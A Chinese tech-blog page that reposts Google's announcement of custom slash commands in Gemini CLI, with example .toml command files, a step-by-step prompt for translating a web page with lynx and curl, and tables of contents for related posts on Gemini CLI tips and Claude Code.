Gemini CLI 现在通过支持 MCP 提示作为斜杠命令，提供了与 MCP 更集成的体验！MCP 为服务器向客户端公开提示模板提供了一种标准化的方法。Gemini CLI 利用这一点来公开已配置 MCP 服务器的可用提示，并使这些提示可用作斜杠命令。

MCP 提示的名称和描述将用作斜杠命令的名称和描述。还支持 MCP 提示参数，并通过使用 /mycommand --="" 或按位置 /mycommand 在斜杠命令中加以利用。

以下是使用 FastMCP Python 服务器的 /research 命令示例：

轻松入门

还在等什么？立即使用 Gemini CLI 升级您的终端体验，并试用自定义斜杠命令来简化您的工作流程。要了解更多信息，请查看 Gemini CLI 的自定义命令文档。

原文

https://cloud.google.com/blog/topics/developers-practitioners/gemini-cli-custom-slash-commands

AI|Gemini CLI,Custom slash commands(转载)

2025-09-09T16:00:00.000Z

July 31, 2025

Jack Wotherspoon, Developer Advocate

Abhi Patel, Software Engineer

Today, we’re announcing support for custom slash commands in Gemini CLI! This highly requested feature lets you define reusable prompts for streamlining interactions with Gemini CLI and helps improve efficiency across workflows. Slash commands can be defined in local .toml files or through Model Context Protocol (MCP) prompts. Get ready to transform how you leverage Gemini CLI with the new power of slash commands!

To use slash commands, make sure that you update to the latest version of Gemini CLI.

Update npx:

1	npx @google/gemini-cli

Update npm:

1	npm install -g @google/gemini-cli@latest

Powerful and extensible foundation with .toml files

The foundation of custom slash commands is rooted in .toml files.

The .toml file provides a powerful and structured base on which to build extensive support for complex commands. To help support a wide range of users, we made the required keys minimal (just prompt). And we support easy-to-use args with {{args}} and shell command execution !{...} directly into the prompt.

Here is an example .toml file that is invoked using /review from Gemini CLI to review a GitHub PR. Notice that the file name defines the command name and it’s case sensitive. For more information about custom slash commands, see the Custom Commands section of the Gemini CLI documentation.

description="Reviews a pull request based on issue number."
prompt = """
Please provide a detailed pull request review on GitHub issue {{args}}.
Follow these steps:
1. Use `gh pr view {{args}}` to pull the information of the PR.
2. Use `gh pr diff {{args}}` to view the diff of the PR.
3. Understand the intent of the PR using the PR description.
4. If PR description is not detailed enough to understand the intent,
   make sure to note it in your review.
5. Make sure the PR title follows Conventional Commits, here are some recent
   commits to the repo as examples: !{git log --pretty=format:%s -n 10}
6. Search the codebase if required.
7. Write a concise review of the PR, keeping in mind to encourage high
   quality and best practices.
8. Use `gh pr comment {{args}} --body {{review}}` to post the review.
Remember to use the GitHub CLI (`gh`) with the Shell tool for all
GitHub-related tasks.
"""

Namespacing

The name of a command is determined by its file path relative to the commands directory. Sub-directories are used to create namespaced commands, with the path separator (/ or ) being converted to a colon (:).

A file at /.gemini/commands/test.toml becomes the command /test.
A file at /.gemini/commands/git/commit.toml becomes the namespaced command /git:commit.

This allows grouping related commands under a single namespace.

Building a slash command

The next few sections show you how to build a slash command for Gemini CLI.

1 - Create the command file

First, create a file named plan.toml inside the ~/.gemini/commands/ directory. Doing so will let you create a /plan command to tell Gemini CLI to only plan the changes by providing a step-by-step plan and to not start on implementation. This approach will let you provide feedback and iterate on the plan before implementation.

Custom slash commands can be scoped to an individual user or project by defining the .toml files in designated directories.

User-scoped commands are available across all Gemini CLI projects for a user and are stored in ~/.gemini/commands/ (note the ~).
Project-scoped commands are only available from sessions within a given project and are stored in .gemini/commands/.

Hint: To streamline project workflows, check these into Git repositories!

1 2	mkdir -p ~/.gemini/commands touch ~/.gemini/commands/plan.toml

2 - Add the command definition

Open plan.toml and add the following content:

# ~/.gemini/commands/plan.toml
description="Investigates and creates a strategic plan to accomplish a goal."
prompt = """
Your primary role is that of a strategist, not an implementer.
Your task is to stop, think deeply, and devise a comprehensive strategic plan.
You MUST NOT write, modify, or execute any code. Your sole focus is on the plan.
Use your available "read" and "search" tools to research and gather information.
Present your strategic plan in markdown. It should be the direct and only output.
1.  **Understanding the Goal:** Re-state the objective to confirm your understanding.
2.  **Investigation & Analysis:** Describe the investigative steps you will take.
3.  **Proposed Strategic Approach:** Outline the high-level strategy.
4.  **Verification Strategy:** Explain how the success of the plan will be verified.
5.  **Anticipated Challenges & Considerations:** Based on your analysis, list potential issues.
Your final output should be ONLY this strategic plan.
"""

3 - Use the command

Now you can use this command within Gemini CLI:

1	/plan How can I make the project more performant?

Gemini will plan out the changes and output a detailed step-by-step execution plan!

Enriched integration with MCP Prompts

Gemini CLI now offers a more integrated experience with MCP by supporting MCP Prompts as slash commands! MCP provides a standardized way for servers to expose prompt templates to clients. Gemini CLI utilizes this to expose available prompts for configured MCP servers and make the prompts available as slash commands.

The name and description of the MCP prompt is used as the slash command name and description. MCP prompt arguments are also supported and leveraged in slash commands by using /mycommand --="" or positionally /mycommand .

The following is an example /research command that uses FastMCP Python server:

Easy to get started

So what are you waiting for? Upgrade your terminal experience with Gemini CLI today and try out custom slash commands to streamline your workflows. To learn more, check out the Custom Commands documentation for the Gemini CLI.

原文

https://cloud.google.com/blog/topics/developers-practitioners/gemini-cli-custom-slash-commands

AI|如何用记笔记的模式写提示词(prompt)让LLM能完成复杂任务

2025-09-09T16:00:00.000Z

以下介绍一种减少LLM在执行复杂任务过程中产生幻觉的技巧,让ai更好完成任务,示例需结合gemini-cli使用,在其他工具中使用方法类似

提示词

指定ai能使用的工具,定义好输入/输出格式,拆分步骤,设定好笔记格式,让ai分步执行,并在每步完成后记到笔记文件中直到完成任务.

如下是一个翻译网页提示词:

输入：
文章URL：https://cloud.google.com/blog/topics/developers-practitioners/gemini-cli-custom-slash-commands

输出：
1. 格式化后的原文article.md
2. 中英文双语版article-en-cn.md
3. 中文版article-cn.md
4. 文章中所有的图片资源

每完成一步，都必须更新progress.md

步骤0: 生成笔记
- 仿照例子和当前任务生成笔记 progress.md

步骤1: 访问网站
- 访问上文输入中网址
- 必须使用 "lynx -dump -image_links URL"命令访问网站
- 网站内容保存在raw.txt中

步骤2：下载图片
- 从raw.txt中提取文章相关图片链接
- 把图片链接写入 progress.md
- 逐一下载到 resources/ 文件夹
- 每下载完成一个图片，必须更新图片下载进度
- 你必须使用curl命令进行下载

步骤3：改写成markdown
- 把raw.txt改写成markdown格式
- 保存在article.md中
- 将article.md中的图片链接指向 resources/ 文件夹

步骤4：翻译成中英文
- 把article.md翻译成中英文对照
- 保存在article-en-cn.md中

步骤5：翻译成中文
- 提取article-en-cn.md中的中文
- 保存在article-cn.md中

----
progress.md 笔记格式

## 任务
[x] xxxxx
[ ] yyyyy
[ ] zzzzz
...

## 图片下载进度
[x] https://xxxx/yyy.png
[ ] https://foo/bar.png
...

## 当前任务
正在下载https://foo/bar.png

封装为gemini-cli命令

将提示词写到文件中 ~/.gemini/commands/translate.toml

prompt = """
输入：
文章URL：{{args}}

输出：
1. 格式化后的原文article.md
2. 中英文双语版article-en-cn.md
3. 中文版article-cn.md
4. 文章中所有的图片资源

每完成一步，都必须更新progress.md

步骤0: 生成笔记
- 仿照例子和当前任务生成笔记 progress.md

步骤1: 访问网站
- 访问上文输入中网址
- 必须使用 "lynx -dump -image_links URL"命令访问网站
- 网站内容保存在raw.txt中

步骤2：下载图片
- 从raw.txt中提取文章相关图片链接
- 把图片链接写入 progress.md
- 逐一下载到 resources/ 文件夹
- 每下载完成一个图片，必须更新图片下载进度
- 你必须使用curl命令进行下载

步骤3：改写成markdown
- 把raw.txt改写成markdown格式
- 保存在article.md中
- 将article.md中的图片链接指向 resources/ 文件夹

步骤4：翻译成中英文
- 把article.md翻译成中英文对照
- 保存在article-en-cn.md中

步骤5：翻译成中文
- 提取article-en-cn.md中的中文
- 保存在article-cn.md中

----
progress.md 笔记格式

## 任务
[x] xxxxx
[ ] yyyyy
[ ] zzzzz
...

## 图片下载进度
[x] https://xxxx/yyy.png
[ ] https://foo/bar.png
...

## 当前任务
正在下载https://foo/bar.png

"""

即可这样使用

1
2
3

gemini

/translate https://cloud.google.com/blog/topics/developers-practitioners/gemini-cli-custom-slash-commands

参考

video

prompt

编程笔记

Claude Code(1)在 WSL Ubuntu 上安装和配置指南

前置要求

安装 Claude Code

验证安装

配置

使用 Claude 订阅登录

跳过登录（使用第三方 API）

使用第三方 LLM API

命令行

vscode中claude code 插件配置

常用命令

获取帮助

(译)AI 裁员潮：亚马逊、微软等科技巨头将 2025 年裁员归因于人工智能

资源重组：从传统业务转向 AI

亚马逊：优化云计算与 Alexa 部门

微软：投资 OpenAI 后的结构调整

IBM: AI替代

2025 年裁员的核心特征

员工的焦虑与技能重塑

结论

原文&参考

AI|L2和L3级自动驾驶有什么区别

1. L2级别：你是“主驾驶”，它是“好助手”

2. L3级别：它是“临时司机”，你是“监考官”

四个维度的核心区别：

总结：

AI|Gemini CLI 实用技巧与窍门

入门指南

技巧1：使用 GEMINI.md 实现持久化上下文

技巧2：创建自定义斜杠命令

技巧3：使用自己的 MCP 服务器扩展 Gemini

技巧4：利用记忆添加与召回

技巧5：使用检查点机制和 /restore 作为撤销按钮

技巧6：读取 Google Docs、Sheets 等文件。配置了 Workspace MCP 服务器后，您可以粘贴 Docs/Sheets 链接，MCP 将获取其内容（需要权限）

技巧7：使用 @ 引用文件和图像以提供明确的上下文

技巧8：即时工具创建（让 Gemini 构建辅助工具）

技巧9：使用 Gemini CLI 排除系统故障或修改配置

技巧10：YOLO 模式 - 自动批准工具操作（谨慎使用）

技巧11：无头和脚本模式（在后台运行 Gemini CLI）

技巧12：保存和恢复聊天会话

技巧13：多目录工作区 - 一个 Gemini，多个文件夹

技巧14：使用 AI 协助组织和清理您的文件

技巧15：压缩长对话以保持在上下文内

技巧16: 用 ! 执行 Shell 命令（和你的终端对话）

技巧17：将每个 CLI 工具视为潜在的 Gemini 工具

技巧18：运用多模态功能 - 让 Gemini 识别图像等内容

技巧19：自定义 $PATH（和工具可用性）以获得稳定性

技巧 20：通过令牌缓存和统计来跟踪和降低令牌消耗

技巧21: 使用 /copy 命令快速复制到剪贴板

技巧 22：掌握 Ctrl+C 用于 Shell 模式和退出

技巧 23：使用 settings.json 自定义 Gemini CLI

技巧 24：利用 IDE 集成（VS Code）获取上下文和差异比较

技巧 25：使用 Gemini CLI GitHub Action 自动化仓库任务

技巧 26：启用Telemetry以获得指标和可观测性

技巧 27：关注路线图（后台代理等）

技巧 28：使用插件增强 Gemini CLI

附加：柯基模式彩蛋 🐕

原文

AI|Gemini CLI Tips & Tricks

Getting Started

Tip 1: Use GEMINI.md for Persistent Context

Tip 2: Create Custom Slash Commands

Tip 3: Extend Gemini with Your Own MCP Servers

Tip 4: Leverage Memory Addition & Recall

Tip 5: Use Checkpointing and /restore as an Undo Button

Tip 6: Read Google Docs, Sheets, and More. With a Workspace MCP server configured, you can paste a Docs/Sheets link and have the MCP fetch it, subject to permissions

Tip 7: Reference Files and Images with @ for Explicit Context

Tip 8: On-the-Fly Tool Creation (Have Gemini Build Helpers)

Tip 9: Use Gemini CLI for System Troubleshooting & Configuration

Tip 10: YOLO Mode - Auto-Approve Tool Actions (Use with Caution)

Tip 11: Headless & Scripting Mode (Run Gemini CLI in the Background)

Tip 12: Save and Resume Chat Sessions

Tip 13: Multi-Directory Workspace - One Gemini, Many Folders

Tip 14: Organize and Clean Up Your Files with AI Assistance

Tip 15: Compress Long Conversations to Stay Within Context

Tip 16: Passthrough Shell Commands with ! (Talk to Your Terminal)

Tip 17: Treat Every CLI Tool as a Potential Gemini Tool

Tip 18: Utilize Multimodal AI - Let Gemini See Images and More

Tip 19: Customize the $PATH (and Tool Availability) for Stability

技巧1：使用 `GEMINI.md` 实现持久化上下文

技巧3：使用自己的 `MCP` 服务器扩展 Gemini

技巧5：使用检查点机制和 `/restore` 作为撤销按钮

技巧7：使用 `@` 引用文件和图像以提供明确的上下文

技巧16: 用 `!` 执行 Shell 命令（和你的终端对话）

技巧19：自定义 `$PATH`（和工具可用性）以获得稳定性

技巧 25：使用 `Gemini CLI GitHub Action` 自动化仓库任务

Tip 1: Use `GEMINI.md` for Persistent Context

Tip 3: Extend Gemini with Your Own `MCP` Servers

Tip 5: Use Checkpointing and `/restore` as an Undo Button

Tip 7: Reference Files and Images with `@` for Explicit Context

Tip 16: Passthrough Shell Commands with `!` (Talk to Your Terminal)

Tip 19: Customize the `$PATH` (and Tool Availability) for Stability

Tip 21: Use `/copy` for Quick Clipboard Copy

Tip 22: Master `Ctrl+C` for Shell Mode and Exiting

Tip 23: Customize Gemini CLI with `settings.json`

Tip 25: Automate Repo Tasks with `Gemini CLI GitHub Action`

Tip 28: Extend Gemini CLI with `Extensions`